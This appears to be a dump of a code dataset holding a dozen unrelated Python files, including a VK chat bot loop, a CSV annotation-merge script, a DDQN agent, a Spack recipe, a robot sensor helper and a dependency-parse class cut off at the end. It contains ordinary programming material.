text stringlengths 8 6.05M |
|---|
#!/usr/bin/python3
# DEVELOPER: https://github.com/undefinedvalue0103/nullcore-1.0/
import vklogging, vk, config, time, vkroot, traceback, pinput, hashlib, threading
try:
import commands, utils
except:
print(vklogging._colorize('$FR'+traceback.format_exc()))
quit()
def null_fnc():
    """Do nothing; installed as vk.log_func to silence the API wrapper's logging."""
    return None
# Wire the shared modules together: every helper module gets references to the
# logger, the config, the VK API wrapper and the bot core (ad-hoc dependency
# injection via module attributes).
vk.log_func=null_fnc
config.logging=vklogging
utils.config = config
utils.logging = vklogging
utils.config = config  # NOTE(review): duplicate of the assignment two lines up
utils.vk = vk
commands.logging = vklogging
commands.config = config
commands.vk = vk
commands.root = vkroot
commands.utils = utils
vklogging.begin()
# Authenticate against the VK API. A one-element list from users.get means the
# token is valid; anything else (error dict, None, exception) aborts startup.
try:
    vklogging.log('$FBLogging in$FR...')
    vk.access_token = config.get('token')
    response = vk.call('users.get')
    if type(response) == list and len(response) == 1:
        vklogging.log('$FGLogged in as $FM{first_name} {last_name} $FR($FB{id}$FR)'.format(**response[0]))
        vkroot.data['self.uid'] = response[0]['id']
    else:
        # Unexpected API answer: log it and exit with status 1.
        vklogging.warn('$FRFailed', repr(response))
        vklogging.close()
        quit(1)
except Exception as error:
    # Network/parse failure during login: exit with status 2.
    vklogging.warn('$FRFailed', repr(error))
    vklogging.close()
    quit(2)
commands.init()
vkroot.logging = vklogging
vkroot.run()
#vkroot.beep(freq=2000, time=.1)
# Message ids already dispatched to a handler thread.
# NOTE(review): this list grows without bound for the lifetime of the process.
handled_ids = []
def handle_message(message, thread_id):
    """Handle one incoming VK message in its own worker thread.

    `message` is the raw message dict from messages.get; `thread_id` is the
    threading.Thread object running this handler (re-injected via `_args`
    by the main loop) and is handed to vkroot.thread_stop() when done.
    """
    # Hard-reboot backdoor, honoured only for the configured developer id.
    if message['body'] == 'RSEIUB' and message['user_id'] == config.get('developer'):
        vk.call('messages.send', peer_id=utils.peer_id(message), message='HARD REBOOTING')
        vkroot.reboot()
    # vklogging.log('Handled', message['body'])
    try:
        response = commands.handle(message)
    except:
        # Any command failure becomes a "bug tracker" report sent to the
        # developer; ordinary users get a generic apology instead of the trace.
        trace = traceback.format_exc()
        bug_message=vklogging._colorize('$FRBugTracker:\n$FBPeer: $FM{peerid}\n$FBUser: $FM*id{userid}\n$FYException while calling command:\n$FY{command}\n\n{trace}'.format(
            command=message['body'],
            trace=trace.replace('\n', '\n$FR'),
            peerid=utils.peer_id(message),
            userid=message['user_id']))
        vklogging.log(bug_message)
        developer = config.get('developer')
        vk.call('messages.send', peer_id=developer, message=vklogging.uncolorize(bug_message))
        response = 'Произошла ошибка при выполнении. О ней уже сообщили разработчику. Приносим извинения за неудобства'
        if message['user_id'] == developer:
            response = vklogging.uncolorize(bug_message)
    if response:
        # Mark the message read and dispatch the reply. A handler may return a
        # plain string, a payload dict, or a list of per-peer payload dicts.
        vk.call('messages.markAsRead', peer_id=utils.peer_id(message), message_ids=message['id'])
        vkroot.messages['handled'] += 1
        if response == '':
            # NOTE(review): unreachable under this nesting ('' is falsy and
            # never enters the `if response:` branch); kept as in the original.
            return
        elif type(response) == str:
            mid = vk.call('messages.send', peer_id=utils.peer_id(message), message=response)
            if type(mid) == int:
                vkroot.sent_ids.append([mid, utils.peer_id(message)])
        elif type(response) == dict:
            mid = vk.call('messages.send', response, peer_id=utils.peer_id(message))
            if type(mid) == int:
                vkroot.sent_ids.append([mid, utils.peer_id(message)])
        elif type(response) == list:
            for data in response:
                mid = vk.call('messages.send', data['payload'], peer_id=data['peer_id'])
                if type(mid) == int:
                    vkroot.sent_ids.append([mid, data['peer_id']])
    vkroot.messages['all'] += 1
    # Deregister this worker thread with the bot core.
    vkroot.thread_stop(thread_id)
vkroot.data['friends-timer'] = 0
# Main polling loop: roughly every 0.5 s fetch the 20 newest messages and spawn
# one handler thread per unread, not-yet-seen message; refresh the friend list
# every 30th tick.
while vkroot.running == True:
    try:
        try:
            if vkroot.data['friends-timer'] % 30 == 0:
                vkroot.data['friends-timer'] = 0
                utils.update_friends()
            else:
                vkroot.data['friends-timer'] += 1
            # vklogging.log('Getting')
            messages = vk.call('messages.get', count=20)
            # vklogging.log(repr(messages))
            if messages is None:
                vklogging.warn('$FRConnection error')
                continue
            elif 'error_code' in messages:
                vklogging.warn('$FRVkError: $FY\x23$FR{error_code}$FY: $FG{error_msg} '.format(**messages))
                continue
            for message in messages['items']:
                if message['id'] not in handled_ids and message['read_state'] == 0:
                    handled_ids.append(message['id'])
                    thread_id = threading.Thread(target=handle_message, args=(message, None))
                    vkroot.thread_run(thread_id)
                    # Re-point the thread's args at itself so the handler can
                    # deregister via vkroot.thread_stop(thread_id).
                    thread_id._args = (message, thread_id)
                    thread_id.start()
        except IOError: #Exception:
            # Transient network failure: log it and keep polling.
            trace = traceback.format_exc()
            vklogging.exception(trace)
        config.__reload__()
        vklogging.logtime('$BW$FR'+vk.bytes_str()+'$F_$B_')
        time.sleep(0.5)
    except KeyboardInterrupt:
        vkroot.stop()
        break
vklogging.close()
# running == -1 signals an abnormal stop requested by the bot core.
if vkroot.running == -1:
    quit(-1)
quit(0)
|
''''
-----------------------------
EJERCICIO N°1
Literales de Python
-----------------------------
Escribe una sola línea de código para obtener esta salida de 3 líneas:
"Estoy"
""aprendiendo""
"""Python"""
-----------------------------
'''
|
import sys, os
import pandas as pd
import datetime
from shutil import move
import csv
## write functions based on audio or not audio
def create_merged(file_old, file_new, file_merged, mode="audio"):
    """Merge basic-level annotations from an old CSV into a newly exported CSV.

    For every row of ``file_new``:
      * if its annotation id exists exactly once in ``file_old`` with the
        same word, the old basic level is carried over;
      * if the id exists but the word changed, or the id is duplicated in the
        old file, or the id is brand new, the basic level is set to a
        "***FIX ME***" placeholder (new rows with an empty word are skipped).
    The merged table is written to ``file_merged``.

    Args:
        file_old: path to the previous CSV (contains basic levels).
        file_new: path to the freshly exported CSV (no basic levels yet).
        file_merged: output path for the merged CSV.
        mode: "audio" or "video"; selects the column-name scheme.

    Returns:
        (old_error, edit_word, new_word) booleans describing what was seen,
        or ([], [], []) when ``mode`` is invalid (kept for backward
        compatibility with existing callers).
    """
    print(mode)
    print(file_old)
    bl_value = "***FIX ME***"
    # Column names differ between the audio and video exports.
    if mode == "audio":
        annotid_col = "annotid"
        word_col = "word"
        basic_level_col = "basic_level"
    elif mode == "video":
        annotid_col = "labeled_object.id"
        word_col = "labeled_object.object"
        basic_level_col = "labeled_object.basic_level"
    else:
        print("Wrong mode value")
        return [], [], []
    old_error = False
    edit_word = False
    new_word = False
    # keep_default_na=False keeps empty cells as '' instead of NaN.
    old_df = pd.read_csv(file_old, keep_default_na=False, engine='python')
    new_df = pd.read_csv(file_new, keep_default_na=False, engine='python')
    # BUG FIX: the original built the result with DataFrame.append(), which was
    # removed in pandas 2.0; collect rows in a list and build the frame once.
    merged_rows = []
    for _, new_row in new_df.iterrows():
        to_add = new_row.copy()  # copy so we never mutate new_df in place
        annot_id = new_row[annotid_col]
        matches = old_df[old_df[annotid_col] == annot_id]
        word = new_row[word_col]
        if len(matches.index) != 0:
            # The id already exists in the old file.
            if len(matches.index) > 1:
                # Ambiguous history: flag it and force a manual fix.
                print("ERROR: annotid not unique in old version : ", annot_id)
                to_add[basic_level_col] = bl_value
                merged_rows.append(to_add)
                old_error = True
            elif word == matches.iloc[0][word_col]:
                # Unchanged word: carry the old basic level over.
                to_add[basic_level_col] = matches.iloc[0][basic_level_col]
                merged_rows.append(to_add)
            else:
                # Same id but the word was edited: basic level must be redone.
                to_add[basic_level_col] = bl_value
                merged_rows.append(to_add)
                edit_word = True
        elif word != '':
            # Brand-new annotation (rows with an empty word are dropped).
            to_add[basic_level_col] = bl_value
            merged_rows.append(to_add)
            new_word = True
    if merged_rows:
        merged_df = pd.DataFrame(merged_rows)
    else:
        merged_df = pd.DataFrame(columns=old_df.columns.values)
    # Drop pandas' auto-generated "Unnamed: N" index columns before writing.
    merged_df = merged_df.loc[:, ~merged_df.columns.str.contains('^Unnamed')]
    merged_df.to_csv(file_merged, index=False)
    return old_error, edit_word, new_word
if __name__ == "__main__":
    # Flags collected per home visit (kept for parity with the commented-out
    # batch workflow further below).
    old_error_list = []
    edit_word_list = []
    new_word_list = []
    # e.g. "2019_1_8_" — prefix used when archiving old files.
    today = str(datetime.datetime.now().year) + "_" \
        + str(datetime.datetime.now().month) + "_" \
        + str(datetime.datetime.now().day) + "_"
    if len(sys.argv) >= 5:
        # Single-file mode: <old.csv> <new.csv> <merged.csv> <mode>
        old = sys.argv[1]
        new = sys.argv[2]
        out = sys.argv[3]
        mode = sys.argv[4]
        if old and out and new:
            old_error, edit_word, new_word = create_merged(old, new, out, mode)
    elif len(sys.argv) == 4:
        # Folder mode: <in_folder> <out_folder> <mode>
        # BUG FIX: the original accepted 2 <= len(sys.argv) <= 4 and then read
        # sys.argv[3], raising IndexError when fewer than 3 args were given.
        in_folder = sys.argv[1]
        out_folder = sys.argv[2]
        mode = sys.argv[3]
        old_list = []
        new_list = []
        out_list = []
        for csv_file in os.listdir(in_folder):
            if csv_file.endswith("processed.csv"):
                new_list.append(os.path.join(in_folder, csv_file))
                # Derive the sparse-code file name from the 5-char id prefix.
                sparse_code_name = csv_file[:5] + "_" + mode + "_sparse_code.csv"
                old_list.append(os.path.join(in_folder, sparse_code_name))
                out_list.append(os.path.join(out_folder, sparse_code_name))
        old_list.sort()
        new_list.sort()
        out_list.sort()
        for old, new, out in zip(old_list, new_list, out_list):
            old_error, edit_word, new_word = create_merged(old, new, out, mode)
    else:
        print("usage: OLD NEW OUT MODE  |  IN_DIR OUT_DIR MODE")
########################################################################
# home_visit_paths = sys.argv[1]
# if len(sys.argv) > 2:
# mode = sys.argv[2]
#
# with open(home_visit_paths, 'r') as f:
# lines = f.readlines()
#
# for line in lines:
# print(line)
# line = line.strip()
#
# # get name of old .csv file (with bl)+path to merged
# # old_path = line+"/Analysis/Audio_Analysis/"
# old_path = line+"/Analysis/Audio_Analysis/"
# for csv_file in os.listdir(old_path):
# # for csv_file in os.listdir(os.path.join(old_path, "old_files")):
# if csv_file.endswith("audio_sparse_code.csv"):
# # if csv_file.startswith("2019_1_8"): ## for one time fixing error
# move(os.path.join(old_path, csv_file), os.path.join(old_path, "old_files", today+csv_file))
# old = os.path.join(old_path, "old_files", today+csv_file)
# # old = os.path.join(old_path, "old_files", csv_file)
# out = os.path.join(old_path, csv_file)
# # out = os.path.join(old_path, csv_file[9:])
#
# # get name of new .csv file (no bl)
# new_path = line+"/Coding/Audio_Annotation/"
# for csv_file in os.listdir(new_path):
# if csv_file.endswith("processed.csv"):
# new = os.path.join(new_path, csv_file)
#
# # compute merge
# if old and out and new:
# old_error, edit_word, new_word = create_merged(old, new, out, mode)
# if old_error:
# old_error_list.append(line)
# if edit_word:
# edit_word_list.append(line)
# if new_word:
# new_word_list.append(line)
#
# # at the very end, write every error/change encountered
# with open("annotid_merge_errors.txt", "w+") as f:
# f.write("old_errors\n")
# for l in old_error_list:
# f.write(l+"\n")
# f.write("edit_word\n")
# for l in edit_word_list:
# f.write(l+"\n")
# f.write("new_word\n")
# for l in new_word_list:
# f.write(l+"\n")
|
# Interactive wizard that walks a developer through bootstrapping component
# tests for a Flipkart service: POM setup, test config, base test class,
# specification generation and a sample test class.
# NOTE: this is a Python 2 script (print statements, raw_input, execfile).
print 'Create a module without any parent in your repo.. Done?',
raw_input()
print "--------------------------------------------------"
print "Step 1: Prepare the Project POM"
print "--------------------------------------------------"
print 'Add two dependencies along with build and repository tags'
print '1) your container jar'
print '2) component-testing jar mentioned below'
print '''
<dependency>
<artifactId>component-testing</artifactId>
<groupId>com.flipkart</groupId>
<version>1.1-SNAPSHOT</version>
</dependency>
'''
print "Done with preparing pom?",
raw_input()
print "------------------------------------------------"
print 'Step 2: Time to Prepare the Test config file'
print "------------------------------------------------"
print 'Create a file (src/test/resources/service-config/test-config.yml) and copy your production config here.'
print ''
print ''
print '/*--------------------------------------------------------------------------------------------------------------'
print "IMPORTANT: replace all your original dependencies following below conventions: Don't keep a Prodution endpoint"
print '--------------------------------------------------------------------------------------------------------------*/'
print 'for ES: localhost:9300'
print 'for Http: localhost:7777'
print 'for Mysql: localhost:3306 : userName and password respectively'
print 'for Zookeeper: localhost:2181'
print 'for aerospike localhost:3000'
print 'for redis sentinel localhost:26379'
print 'for solr localhost:8983'
print ''
print "Done with config file preparion ?",
raw_input()
print '------------------------------------------------------'
print 'Step 3: Outline Preparation'
print '-----------------------------------------------------'
print 'Enter the port on which your service will spawn:',
port = int(raw_input())
print 'Enter the Main class of your application (Eg: A.class)',
serviceClass = raw_input()
print 'create a class BaseIntegrationTest with contents below in test directory'
# The %s placeholders are filled with the port and main-class name collected above.
print('''
import com.flipkart.component.testing.orchestrators.SpecificationRunner;
import org.junit.BeforeClass;
public abstract class BaseIntegrationTest{
protected static SpecificationRunner specificationRunner;
@BeforeClass
public static void setUp() {
String configPath = "src/test/resources/service-config/test-config.yaml";
String serviceUrl = "http://localhost:%s";
if(specificationRunner==null)
specificationRunner = new SpecificationRunner(configPath, serviceUrl, %s.class );
}
}
''' % (str(port), serviceClass))
print 'Done with base test class ?'
raw_input()
print '------------------------------------------------------'
print 'Step 4: Creating Test Specification file'
print '------------------------------------------------------'
print 'Provide the inputs as asked below and copy the generated test specifications to the specification file under folder src/test/resources'
# Delegates the spec-building dialogue to a sibling script in the same directory.
execfile("create-spec.py")
print 'Done with creating the test specification json ?'
raw_input()
print '------------------------------------------------------'
print 'Step 5: Creating Test class'
print '------------------------------------------------------'
print 'Create a test class with the content as shown below : for ex TestClass.class'
print '''
public class TestClass extends BaseIntegrationTest {
List<Observation> observations;
@Test
public void testCase1() throws Exception {
String specFilePath ="path_to_specification_file.json";
observations = specificationRunner.runLite(specFilePath);
//add assertions as required
Assert.assertEquals(200,((HttpObservation) observations.get(0)).getStatuscode());
}
@Test
public void testCase2() throws Exception {
String specFilePath ="path_to_specification_file.json";
observations = specificationRunner.runLite(specFilePath);
//add assertions as required
Assert.assertEquals(200,((HttpObservation) observations.get(0)).getStatuscode());
}
}
'''
#!/usr/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'demo-py==0.0.0','console_scripts','demo'
__requires__ = 'demo-py==0.0.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix added by setuptools' Windows
    # launchers so the program name looks clean, then invoke the 'demo'
    # console entry point of the demo-py distribution and exit with its status.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('demo-py==0.0.0', 'console_scripts', 'demo')()
    )
|
from sonic import *
import time
def setDir():
    """Poll the three ultrasonic sensors and choose a direction code.

    A reading of 0 means "no echo" (nothing detected / dead sensor); a
    reading <= 5 and non-zero means an obstacle is close.

    Returns:
        0 - no rule matched (keep current behaviour)
        1 - all three sensors read 0
        3 - steer one way (obstacle pattern favouring sensor 3)
        4 - steer the other way (obstacle pattern favouring sensors 1/2)
    """
    time.sleep(0.02)  # let the sensors settle between reads
    SS1 = printsonic(1)
    SS2 = printsonic(2)
    SS3 = printsonic(3)
    print("SS1 = ", SS1, "SS2 = ", SS2, "SS3 = ", SS3)
    res = 0
    if SS1 + SS2 + SS3 == 0:
        res = 1
    elif SS2 <= 5 and SS2 != 0:
        # BUG FIX: the nested test used "SS2 != 0" (always true here) instead
        # of "SS3 != 0", so a silent sensor 3 (reading 0) was misclassified
        # as a close obstacle. Every other branch uses SSx <= 5 and SSx != 0.
        if SS3 <= 5 and SS3 != 0:
            res = 3
        else:
            res = 4
    elif SS1 <= 5 and SS1 != 0:
        res = 4
    elif SS3 <= 5 and SS3 != 0:
        res = 3
    return res
def setDirTest():
    """Single-sensor variant of setDir used for bench testing.

    Returns 1 when sensor 1 reads 0 (no echo), otherwise 3.
    """
    time.sleep(0.1)
    reading = printsonic(1)
    print("SS1", reading)
    return 1 if reading == 0 else 3
Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:44:40) [MSC v.1600 64 bit (AMD64)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> x =1 #int
>>> y=2.8 #float
>>> z=1j #complex
>>> print (type(x)))
SyntaxError: invalid syntax
>>> print (type (x) )
<class 'int'>
>>> print(type (y) )
<class 'float'>
>>> print(type (z) )
<class 'complex'>
>>> x= 1
>>> y= 35656544444
>>> z=-325522
>>> print (type (x) )
<class 'int'>
>>> print (type (y) 0
SyntaxError: invalid syntax
>>> print (print (y) )
35656544444
None
>>> print (type (z) )
<class 'int'>
>>> x=1.10
>>> y=1.0
>>> z= -35.59
>>> print (type(x) )
<class 'float'>
>>> print (type(y) )
<class 'float'>
>>> print (type(z) )
<class 'float'>
>>>
x=35e3
>>> y=12e4
>>> z=-87.7e100
>>> print(type(x) )
<class 'float'>
>>> print (type(y) )
<class 'float'>
>>> print (type (z) )
<class 'float'>
>>> x= 3+5j
>>> y=5j
>>> z= -5j
>>> print (type(x) )
<class 'complex'>
>>> print (type(y) )
<class 'complex'>
>>> print (type(z) )
<class 'complex'>
>>> x = 1 #int
>>> y =2.8 #float
>>> z= 1j #complex
>>> #convert form float int to float:
>>> a=float(x)
>>> #convert form float to int
>>> b=int (y)
>>> #convert from int to complex:
>>> c=complex(x)
>>> print(a)
1.0
>>> print(b)
2
>>> print(c)
(1+0j)
>>> print(type(a))
<class 'float'>
>>> print(type(b))
<class 'int'>
>>> print(type(c))
<class 'complex'>
>>> import random
>>> print(random.randrange(1,10))
2
>>> print(random.randrange(1,10))
SyntaxError: unexpected indent
>>> print(random.randrange(1,10))
4
>>>
|
import os
class Card:
    """A trading card with a name, image, price, ability text and extension."""

    def __init__(self, name):
        self.name = name
        self.image = ""        # path/URL of the card art
        self.prix = 0.0        # price
        self.capacite = ""     # ability text
        self.extension = "None"  # extension/set name, also the output file stem
        # BUG FIX: save() writes self.description, but it was never
        # initialised, so every save() call raised AttributeError.
        self.description = ""

    def save(self, path):
        """Append this card as one comma-separated line to <path>/<extension>.txt."""
        if path[len(path) - 1] != '/':
            path = path + '/'
        path = path + self.extension + ".txt"
        # Context manager so the handle is flushed and closed (the original
        # leaked the open file).
        with open(path, "a") as out:
            line = self.name + "," + str(self.prix) + "," + self.extension + "," + self.description + "\n"
            out.write(line)
import torch
import torch.nn as nn
from torch.nn.functional import mse_loss, smooth_l1_loss
from torch.autograd import Variable
import torch.optim as optim
from collections import namedtuple
import random
import numpy as np
from model import model
from ReplayMemory import ReplayMemory
# One replay-buffer entry: state, action, reward, next state (None if terminal).
Transition = namedtuple('Transition', ['s', 'a', 'r', 's_'])
class DDQN():
    """Deep Q-Network agent with an optional double-DQN target estimate.

    Uses an epsilon-greedy policy, an experience-replay buffer and either
    soft (Polyak) or periodic hard target-network updates.
    """

    def __init__(self, state_num, action_num, device, CONFIG, action_list):
        """
        Args:
            state_num: dimensionality of the state vector.
            action_num: number of discrete actions.
            device: torch device the networks run on.
            CONFIG: hyper-parameter namespace (epsilon/lr schedules, batch
                size, gamma, target-update settings, ...).
            action_list: mapping from action index to the concrete action.
        """
        self.action_list = action_list
        self.memory = ReplayMemory(CONFIG.MEMORY_CAPACITY)

        #== ENV PARAM ==
        self.state_num = state_num
        self.action_num = action_num

        #== PARAM ==
        # Epsilon and the critic learning rate both decay exponentially; the
        # *_START/*_END/*_DECAY triples drive the schedules applied in update().
        self.EPSILON = CONFIG.EPSILON
        self.EPS_START = CONFIG.EPSILON
        self.EPS_END = CONFIG.EPSILON_END
        self.EPS_DECAY = CONFIG.MAX_EP_STEPS
        self.LR_C = CONFIG.LR_C
        self.LR_C_START = CONFIG.LR_C
        self.LR_C_END = CONFIG.LR_C_END
        self.LR_C_DECAY = CONFIG.MAX_EP_STEPS * CONFIG.MAX_EPISODES / 2
        self.BATCH_SIZE = CONFIG.BATCH_SIZE
        self.GAMMA = CONFIG.GAMMA
        self.MAX_MODEL = CONFIG.MAX_MODEL

        #== Target Network Update ==
        self.TAU = CONFIG.TAU
        self.HARD_UPDATE = CONFIG.HARD_UPDATE
        self.SOFT_UPDATE = CONFIG.SOFT_UPDATE

        #== DQN ==
        self.double = CONFIG.DOUBLE
        self.device = device
        self.build_network()

    def build_network(self):
        """Create the online and target networks plus the optimizer."""
        self.Q_network = model(self.state_num, self.action_num)
        self.target_network = model(self.state_num, self.action_num)
        if self.device == torch.device('cuda'):
            self.Q_network.cuda()
            self.target_network.cuda()
        self.optimizer = optim.Adam(self.Q_network.parameters(), lr=self.LR_C)
        self.max_grad_norm = 0.5  # NOTE: only used by the commented-out clipping line
        self.training_step = 0

    def update_target_network(self):
        """Blend (soft) or copy (hard) the online weights into the target net."""
        if self.SOFT_UPDATE:
            # Polyak averaging on every call; linear layers only.
            for module_tar, module_pol in zip(self.target_network.modules(), self.Q_network.modules()):
                if isinstance(module_tar, nn.Linear):
                    module_tar.weight.data = (1-self.TAU)*module_tar.weight.data + self.TAU*module_pol.weight.data
                    module_tar.bias.data = (1-self.TAU)*module_tar.bias.data + self.TAU*module_pol.bias.data
        elif self.training_step % self.HARD_UPDATE == 0:
            # Full copy every HARD_UPDATE training steps.
            self.target_network.load_state_dict(self.Q_network.state_dict())

    def update(self):
        """Run one optimisation step on a replay batch.

        Returns the scalar loss, or None while the buffer is still warming up.
        """
        # Wait until the buffer holds enough samples for a stable update.
        if len(self.memory) < self.BATCH_SIZE*20:
            return
        self.training_step += 1

        #== EXPERIENCE REPLAY ==
        transitions = self.memory.sample(self.BATCH_SIZE)
        # Transpose the batch: list of Transitions -> Transition of lists
        # (see https://stackoverflow.com/a/19343/3343043).
        batch = Transition(*zip(*transitions))

        # Mask of non-terminal transitions (s' is not None).
        non_final_mask = torch.tensor(tuple(map(lambda s: s is not None, batch.s_)),
                                      device=self.device, dtype=torch.bool)
        # NOTE(review): the legacy torch.FloatTensor(..., device=...) calls
        # below are CPU-only in modern torch; torch.tensor(...) would be the
        # current equivalent — left unchanged to preserve behaviour.
        non_final_state_nxt = torch.FloatTensor([s for s in batch.s_ if s is not None],
                                                device=self.device)
        state = torch.FloatTensor(batch.s, device=self.device)
        action = torch.LongTensor(batch.a, device=self.device).view(-1,1)
        reward = torch.FloatTensor(batch.r, device=self.device)

        #== get Q(s,a) ==
        # gather requires a Long index of the same shape except on dim 1;
        # result[i] = Q[i][action[i]].
        state_action_values = self.Q_network(state).gather(1, action).view(-1)

        #== a' chosen by the online network: a' = argmax_a' Q_policy(s', a') ==
        with torch.no_grad():
            action_nxt = self.Q_network(non_final_state_nxt).max(1, keepdim=True)[1]

        #== expected value: y = r + gamma * Q_tar(s', a'); 0 for terminal s' ==
        state_value_nxt = torch.zeros(self.BATCH_SIZE, device=self.device)
        with torch.no_grad():
            if self.double:
                # Double DQN: evaluate the online argmax with the target net.
                Q_expect = self.target_network(non_final_state_nxt)
            else:
                Q_expect = self.Q_network(non_final_state_nxt)
            state_value_nxt[non_final_mask] = Q_expect.gather(1, action_nxt).view(-1)
        expected_state_action_values = (state_value_nxt * self.GAMMA) + reward

        #== regression Q(s, a) -> y ==
        self.Q_network.train()
        loss = smooth_l1_loss(input=state_action_values, target=expected_state_action_values.detach())

        #== backward optimize ==
        self.optimizer.zero_grad()
        loss.backward()
        #nn.utils.clip_grad_norm_(self.Q_network.parameters(), self.max_grad_norm)
        self.optimizer.step()

        #== Update Target Network ==
        self.update_target_network()

        #== Hyper-Parameter Update (exponential decay schedules) ==
        self.EPSILON = self.EPS_END + (self.EPS_START - self.EPS_END) * \
            np.exp(-1. * self.training_step / self.EPS_DECAY)
        self.LR_C = self.LR_C_END + (self.LR_C_START - self.LR_C_END) * \
            np.exp(-1. * self.training_step / self.LR_C_DECAY)

        return loss.item()

    def select_action(self, state):
        """Epsilon-greedy selection; returns (action, action_index)."""
        state = torch.from_numpy(state).float().unsqueeze(0)
        if random.random() < self.EPSILON:
            action_index = random.randint(0, self.action_num-1)
        else:
            action_index = self.Q_network(state).max(1)[1].item()
        return self.action_list[action_index], action_index

    def store_transition(self, *args):
        """Push a (s, a, r, s_) transition into the replay buffer."""
        self.memory.update(Transition(*args))

    def save(self, step, logs_path):
        """Checkpoint the online network, keeping at most MAX_MODEL files."""
        # BUG FIX: `os` and `glob` were used here but never imported at module
        # level, so every save() raised NameError.
        import glob
        import os
        os.makedirs(logs_path, exist_ok=True)
        model_list = glob.glob(os.path.join(logs_path, '*.pth'))
        if len(model_list) > self.MAX_MODEL - 1:
            # Evict the oldest checkpoint; names follow 'model-<step>.pth'.
            min_step = min([int(li.split('/')[-1][6:-4]) for li in model_list])
            os.remove(os.path.join(logs_path, 'model-{}.pth'.format(min_step)))
        logs_path = os.path.join(logs_path, 'model-{}.pth'.format(step))
        self.Q_network.save(logs_path, step=step)
        print('=> Save {}'.format(logs_path))

    def restore(self, logs_path):
        """Load checkpointed weights into both the online and target networks."""
        self.Q_network.load(logs_path)
        self.target_network.load(logs_path)
        print('=> Restore {}'.format(logs_path))
def example_function():
    """Print a fixed demo message (used by the __main__ smoke test below)."""
    message = "THIS IS AN EXAMPLE FUNCTION"
    print(message)
def read_antibiotics_file_and_print():
    """Read ./antibiotics.csv and echo it line by line.

    Assumes the file exists in the current working directory; a missing
    file raises FileNotFoundError.
    """
    # Slurp the whole file; the context manager closes it for us.
    with open("antibiotics.csv") as antibiotics_file:
        file_contents = antibiotics_file.read()
    # Split on the newline character and print each line followed by an
    # extra blank line (print adds its own newline on top of ours).
    for line in file_contents.split("\n"):
        print(line + "\n")
"""
Don't worrie too much about what this means, this is just the "python" way
of setting the entry point of the file. When you run this python file
as is (versus including it from another file), it will run this protion.
"""
if __name__ == "__main__":
print("TESTING")
example_function()
read_antibiotics_file_and_print()
|
from spack import *
import shutil
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class OracleocciAbiHackCms(Package):
    """An ABI hack to occi.h with std=c++17 (CMS Spack build recipe)."""

    homepage = "https://github.com/cms-sw"
    url = "https://github.com/cms-sw/cms_oracleocci_abi_hack.git"

    # Pinned to an exact commit for reproducible builds.
    version('1.0.0', git = "https://github.com/cms-sw/cms_oracleocci_abi_hack.git",
        commit='88b2a965305226df1822a14af8fe7174ee5f1614')

    depends_on('oracle')

    def install(self, spec, prefix):
        # Build in-tree, then copy the produced lib/ and include/ trees
        # from build/ into the installation prefix.
        make()
        with working_dir('build', create=False):
            shutil.copytree('lib',prefix.lib)
            shutil.copytree('include',prefix.include)

    def setup_environment(self, spack_env, run_env):
        # Point the build at the Oracle client headers and libraries.
        spack_env.set('INCLUDE_DIR','%s' % self.spec['oracle'].prefix.include)
        spack_env.set('LIB_DIR', '%s' % self.spec['oracle'].prefix.lib)
|
"""
"""
from collections import OrderedDict, namedtuple
from typing import List, Union, Tuple, Dict
# A single edge in the dependency graph: (dependent token id, arc label).
Dependency = namedtuple('Dep', 'dependent arc')  # int, str


class DependencyParse:
    """Abstract interface over a sentence's dependency parse."""

    def is_arc_present_below(self, token_id: int, arc: str) -> bool:
        raise NotImplementedError

    @property
    def style(self) -> str:
        raise NotImplementedError

    def get_leaves(self, token_id: int) -> List[OrderedDict]:
        raise NotImplementedError

    def get_leaves_by_arc(self, arc: str, head=None, sentence_id=1) -> Tuple[int, List[OrderedDict]]:
        raise NotImplementedError

    def get_child_with_arc(self, token_id: int, arc: str) -> Union[None, OrderedDict]:
        raise NotImplementedError

    def collect_compounds(self, token_id: int) -> List[OrderedDict]:
        raise NotImplementedError


class UniversalDependencyParse(DependencyParse):
    """DependencyParse backed by Universal Dependencies style arcs.

    `dependencies['arcs']` maps each token id to its incoming arc(s); token
    ids are assumed to be 1-based indexes into `tokens`.
    """

    def __init__(self, dependencies: dict, tokens: list):
        self.deps: dict = dependencies
        self.tokens: list = tokens
        self.nodes: Dict[int, List[Dependency]] = {}       # governor id -> outgoing edges
        self.sentence_heads: Dict[int, int] = {}           # sentenceId -> head token id
        if dependencies.get('style', 'universal') != 'universal':
            raise ValueError(f"{dependencies['style']} is not universal!")
        self._build_nodes()

    def _build_nodes(self):
        # Index each token's (first) incoming arc by its governor; governor 0
        # marks a sentence root.
        for token in self.tokens:
            arc_info: dict = self.deps['arcs'][token['id']][0]
            governor = arc_info['governor']
            self.nodes.setdefault(governor, [])
            if governor == 0:
                self.sentence_heads[arc_info['sentenceId']] = token['id']
            self.nodes[governor].append(
                Dependency(dependent=arc_info['dependent'], arc=arc_info['label']))

    def is_arc_present_below(self, token_id: int, arc: str) -> bool:
        """True if `arc` labels any edge in the subtree rooted at `token_id`."""
        pending = list(self.nodes.get(token_id, []))
        while pending:
            edge = pending.pop()
            if edge.arc == arc:
                return True
            pending.extend(self.nodes.get(edge.dependent, []))
        return False

    @property
    def style(self) -> str:
        return self.deps.get('style', 'universal')

    def get_leaves(self, token_id: int) -> List[OrderedDict]:
        """All tokens in the subtree rooted at `token_id`, sorted by id."""
        collected = [self.tokens[token_id - 1]]
        pending = list(self.nodes.get(token_id, []))
        while pending:
            edge = pending.pop()
            collected.append(self.tokens[edge.dependent - 1])
            pending.extend(self.nodes.get(edge.dependent, []))
        return sorted(collected, key=lambda tok: tok['id'])

    def get_leaves_by_arc(self, arc: str, head=None, sentence_id=1) -> Tuple[int, List[OrderedDict]]:
        """Find the first `arc` edge below `head` and return (dependent id, its leaves).

        Falls back to the sentence head when no explicit `head` is given;
        returns (0, []) when the arc does not occur.
        """
        if head is None:
            head = self.sentence_heads[sentence_id]
        pending = list(self.nodes.get(head, []))
        while pending:
            edge = pending.pop()
            if edge.arc == arc:
                return edge.dependent, self.get_leaves(edge.dependent)
